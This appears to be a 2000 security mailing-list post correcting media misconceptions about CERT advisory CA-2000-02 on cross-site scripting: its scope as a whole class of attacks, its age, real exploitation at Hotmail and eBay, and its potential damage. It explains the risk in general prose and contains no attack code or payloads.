recent 'cross site scripting' CERT advisory

[tim () RSTCORP COM (Tim Hollebeek)]

Wednesday's CERT advisory CA-2000-02 "Malicious HTML Tags Embedded in Client
Web Requests" has received some attention in the mass media.  This is very
appropriate due to the importance of the reported problem.  However, many
media reports have contained a number of innacuracies about the nature,
scope, and impact of the problem.
This post is intended to clear up a number of misconceptions about what the
problem
is and what the impact is.  For the full details, including an enumeration
of a number of possible attack scenarios, the CERT advisory should be read
in its entirety.

Misconception #1: This is a single bug or problem

The CERT advisory warns of an entire class of attacks.  Every web site that
offers
 more than simple unchanging HTML pages is potentially at risk.  This
 means every e-commerce site, every auction site, every web based mail site,
etc.
Any software that can understand and interpret URLs and HTML, and
communicates with the outside world is also potentially at risk.

Misconception #2: This problem is "new"

Security experts and hackers have been aware of the ability to exploit these
problems for a long time, but creators of web sites and web-enabled software
have for the most part not paid adequate attention to these problems.
CERT's motivation appears to be to raise awareness of these significant
dangers in the hopes that future and existing systems will be
(re-)engineered with these problems in mind.

Misconception #3: This problem has never been exploited by hackers.

Many of the problems with Microsoft's hotmail have been due to attacks which
 fall within the range of this security advisor, as does the eBayla attack
on eBay.

Misconception #4: The potential damage from these attacks is minimal.

While scripting languages have very limited ability to take actions that can
lead to security compromises in the traditional sense, they allow for a wide
range of new attacks that can be equally devastating to a host system or
company.  Most attacks involving scripts lead to the loss or alteration of
protected, valuable or sensitive information like credit card numbers,
customer information, passwords, or even the contents of entire pages on
private
intranets.  If this information can be easily accessed or manipulated  there
often no longer is any need to break into or gain administrative access to
the machine.  The critical function of the server, which is its ability to
protect and process sensitive or valuable information, has already been
compromised.

Tim Hollebeek
Reliable Software Technologies